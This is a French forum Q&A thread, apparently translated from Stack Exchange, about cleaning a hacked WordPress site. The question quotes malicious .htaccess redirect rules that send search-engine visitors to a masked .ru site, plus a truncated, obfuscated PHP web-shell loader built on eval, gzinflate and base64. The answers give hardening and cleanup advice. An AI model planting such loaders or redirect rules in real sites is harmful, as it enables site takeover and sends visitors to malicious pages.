web-dev-qa-db-fra.com

Nettoyer un site Web attaqué

Depuis peu de mois, un site client est attaqué par des robots. J'ai changé la source du site Web (maintenant wordpress dernière version), essayez de nettoyer mais trouvez un trou dans la sécurité ...

Après l'action du bot, je peux trouver les fichiers .htaccess sur le site avec ceci à l'intérieur:

ErrorDocument 400 http://**********.ru/upday/index.php
ErrorDocument 401 http://**********.ru/upday/index.php

[...]

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|Twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L]

[...]

Je peux trouver dans mes fichiers de log le fichier utilisé pour ajouter .htaccess:

77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php
 HTTP/1.1" 200 34 "-" "-"

Avec ce code à l'intérieur:

<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A
\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64
\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck
REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC
tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk
tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru
mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu
mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj
AQzKhlHgTkLPCodOWCzQSCFI4 [...]

Je supprime les fichiers .php, .htaccess, mais ils apparaissent après des heures ou des minutes ... Quelle est la marche à suivre pour trouver le trou/arrêter l'attaque de bot?

(c'est sur l'hébergement partagé (ovh.com)

botattack
7
bux

Étapes de sécurité de base

Puisque Wordpress est si populaire, il y a beaucoup de drive by hacks frapper à la tire en profitant des failles de la sécurité de base. Tous les utilisateurs de Wordpress doivent suivre les étapes simples suivantes pour se protéger: -

  • N'utilisez pas wp_ comme préfixe de table de base de données, utilisez n'importe quelle chaîne de caractères aléatoires faisant appel.
  • Désactivez les erreurs Wordpress DB.
  • Assurez-vous que votre répertoire est défini sur chmod 755 et les fichiers 644.
  • Utilisez un générateur de mot de passe sécurisé (utilisez au moins 15 caractères).
  • N'utilisez pas admin comme nom d'utilisateur.
  • Placez un fichier .htaccess vierge dans le répertoire wp-admin.
  • Lire Wordpress durcissement
  • Consultez le cache Google de votre site pour détecter les programmes malveillants cachés.
  • Supprimez <meta name="generator" content="WordPress X.X.X" /> de l'en-tête de votre site en plaçant remove_action('wp_head', 'wp_generator'); dans votre fichier functions.php (les attaquants n'auront pas un moyen facile de trouver la version qu'ils ciblent).

TimThumb Hack

Il existe également un lecteur très populaire par piratage associé à une ancienne version du script populaire tim thumb , ce qui cause beaucoup de problèmes pour les webmasters. Vérifiez votre répertoire de téléchargement pour les fichiers php et assurez-vous que vous avez mis à niveau vers la dernière version du script pour éviter cela.

Conseils

J'exécute environ 10 Wordpresses différents et j'ai trouvé le plugin et le compte WP-Security de site Web défenseur inestimable, il analyse votre site régulièrement et signale des erreurs de sécurité, des logiciels malveillants et même des erreurs de page par courrier électronique afin que vous puissiez Soyez assuré que vous savez quand quelque chose ne va pas.

WP-Firewall est également très utile pour la défense contre les exploits à 0 jour et VirusTotal est pratique si vous suspectez une infection.

Akismet et Disqus.com sont des outils utiles pour se défendre contre le spam par commentaire, et vous devriez lire le wiki de la communauté de webmestres professionnels à ce sujet .

Outils pour les webmasters

Vous devez également vous inscrire aux outils pour les webmasters , mais si vous suspectez une infection, prenez toutes les mesures nécessaires pour la trouver et la nettoyer en premier . Sinon, vous pourriez vous retrouver avec une infection. Google avertit vos utilisateurs que votre site est un site d’attaque signalé.

S'il détecte une infection, Google enverra un courrier électronique à toutes les adresses suivantes abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@. Vous devez donc vous assurer qu'au moins une de celles-ci est en place et surveillée.

Services de déménagement payants/Où obtenir de l'aide

Il existe également un certain nombre de sites proposant des services payants de lutte contre les logiciels malveillants. Je serais très méfiant parmi eux - beaucoup semblent être des arnaques .

Il existe de nombreuses aides et supports de haute qualité disponibles gratuitement dans le forums wordpress , ici sur les serveurs pour webmasters, le - wordpress stackexchange site et sur stackoverflow . Ne payez pas pour des choses que vous pouvez réparer vous-même.

9
toomanyairmiles

Vous devez supprimer complètement tous les fichiers de votre site Web et effectuer une nouvelle installation de Wordpress. Les chances sont-ils des fichiers téléchargés qui leur permettent un accès continu à votre site. À moins que vous ne souhaitiez consulter un fichier à la fois, essayer de déterminer lequel est une installation complète à partir de zéro est la meilleure chose à faire.

8
John Conde